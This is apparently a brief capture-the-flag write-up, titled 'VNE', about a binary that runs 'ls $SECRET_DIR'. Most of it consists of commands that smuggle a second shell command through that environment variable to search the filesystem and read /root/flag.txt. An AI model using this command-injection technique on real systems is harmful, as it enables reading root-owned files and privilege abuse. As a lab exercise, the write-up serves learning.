VNE

The binary seems to execute ls $SECRET_DIR

env -i SECRET_DIR='-R / | grep -i "flag"' ./bin 

There's a flag.txt, let's find it:

env -i SECRET_DIR='; find / -name "flag.txt"' ./bin 

It is located at /root/flag.txt

env -i SECRET_DIR=';cat /root/flag.txt' ./bin